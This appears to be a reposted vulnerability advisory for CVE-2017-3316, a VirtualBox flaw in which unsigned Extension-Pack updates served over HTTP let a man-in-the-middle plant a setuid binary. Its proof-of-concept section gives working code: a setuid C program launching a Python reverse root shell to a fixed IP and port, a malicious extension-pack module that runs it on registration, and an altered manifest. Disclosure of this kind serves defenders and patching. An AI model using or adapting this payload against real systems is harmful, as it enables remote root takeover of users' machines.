VirtualBox prior to 5.1.14 Privilege Escalation
Posted on 30 November -0001
<HTML><HEAD><TITLE>VirtualBox prior to 5.1.14 Privilege Escalation</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Privilege Escalation in VirtualBox (CVE-2017-3316) == [ Overview ] === System affected: VirtualBox Software-Version: prior to 5.0.32, prior to 5.1.14 User-Interaction: Required Impact: A Man-In-The-Middle could infiltrate an Extension-Pack-Update to gain a root-shell === [ Detailed description ] === In my research about update mechanism of open-source software I found vulnerabilities in Oracle's VirtualBox. It's possible to compromise a system behind a firewall by infiltrating the updates of Extension-Packs because of the following flaws: 1. The Extension-Pack is updated via HTTP instead of HTTPS. The Extension-Packs are not signed, so a Man-In-The-Middle could send his own Extension-Pack(with malicious code included) instead of the regular update to the target. The Code would be executed with user-permissions. I reported this bug to Oracle but I think someone else discovered and reported it before. This bug also affects VirtualBox prior to 5.0.32, prior to 5.1.14. I don't know the CVE. 2. CVE-2017-3316: There is a privilege escalation bug in the downloader of VirtualBox. Extension-Packs are tar-archives. Tar-archives can preserve permissions. A Man-In-The-Middle could include an executable with setuid-permissions to the Extension-Pack. If the victim downloads the Ext-pack, it will be stored as owner root and without checking the permissions of the binaries. This bug affects VirtualBox prior to 5.0.32, prior to 5.1.14 === [ Proof-Of-Concept ] === The executeable of the following code is placed in the Extension-Pack-Archive under linux.amd64/evil with setuid. /* evil.c(executable with the reverse-shell) */ #include <unistd.h> int main() { setuid(0); execl("/usr/bin/python","python","-c","import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.12.32.15",5000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);",NULL); return 0; } The VirtualBox-Sources are downloaded next and the following code has to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp: /* $Id: VBoxEvilMain.cpp $ */ /** @file * Evil main module. */ /* * Copyright (C) 2010-2016 Oracle Corporation * * Permission is hereby granted, free of charge, to any person * obtaining a copy of this software and associated documentation * files (the "Software"), to deal in the Software without * restriction, including without limitation the rights to use, * copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following * conditions: * * The above copyright notice and this permission notice shall be * included in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR * OTHER DEALINGS IN THE SOFTWARE. */ #include <VBox/ExtPack/ExtPack.h> #include <VBox/err.h> #include <VBox/version.h> #include <VBox/vmm/cfgm.h> #include <iprt/string.h> #include <iprt/param.h> #include <iprt/path.h> static PCVBOXEXTPACKHLP g_pHlp; static const VBOXEXTPACKREG g_vboxEvilExtPackReg = { VBOXEXTPACKREG_VERSION, /* .uVBoxFullVersion = */ VBOX_FULL_VERSION, /* .pfnInstalled = */ NULL, /* .pfnUninstall = */ NULL, /* .pfnVirtualBoxReady =*/ NULL, /* .pfnConsoleReady = */ NULL, /* .pfnUnload = */ NULL, /* .pfnVMCreated = */ NULL, /* .pfnVMConfigureVMM = */ NULL, /* .pfnVMPowerOn = */ NULL, /* .pfnVMPowerOff = */ NULL, /* .pfnQueryObject = */ NULL, /* .pfnReserved1 = */ NULL, /* .pfnReserved2 = */ NULL, /* .pfnReserved3 = */ NULL, /* .pfnReserved4 = */ NULL, /* .pfnReserved5 = */ NULL, /* .pfnReserved6 = */ NULL, /* .u32Reserved7 = */ 0, VBOXEXTPACKREG_VERSION }; #include <unistd.h> /** @callback_method_impl{FNVBOXEXTPACKREGISTER} */ extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp, PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo) { pid_t pid = fork(); if(pid == 0) { execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL); } /* * Check the VirtualBox version. */ if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version, VBOXEXTPACKHLP_VERSION)) return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH, "Helper version mismatch - expected %#x got %#x", VBOXEXTPACKHLP_VERSION, pHlp->u32Version); if ( VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) != VBOX_VERSION_MAJOR || VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) != VBOX_VERSION_MINOR) return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH, "VirtualBox version mismatch - expected %u.%u got %u.%u", VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR, VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion), VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion)); /* * We're good, save input and return the registration structure. */ g_pHlp = pHlp; *ppReg = &g_vboxEvilExtPackReg; return VINF_SUCCESS; } After compiling, this Extension-Pack-Module is placed in the Archive under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the ExtPack.xml so that the Evil-Module is used: <!--?xml version="1.0"?--> <virtualboxextensionpack version="1.0" xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack";> <name>Oracle VM VirtualBox Extension Pack</name> <description>USB 2.0 and USB 3.0 Host Controller, Host Webcam, VirtualBox RDP, PXE ROM, Disk Encryption.</description> <version revision="112026">5.1.10</version> <mainmodule>VBoxEvilMain</mainmodule> <vrdemodule>VBoxVRDP</vrdemodule> <showlicense> </showlicense></virtualboxextensionpack> Note: To make this Extension-Pack valid it is necessary to add all the file-checksumms to ExtPack.manifest. The victim will be asked for the root password during the update. If the attacker sends this malicious Extension-Pack, a reverse root-shell will be executed. === [ Timeline ] === This bug was reported in December. Oracle answered on the same day and gave status reports regularly. They released a patch on January 17th. === [ Credits ] === CVE-2017-3316 was discovered by Wolfgang Hotwagner (https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316) </BODY></HTML>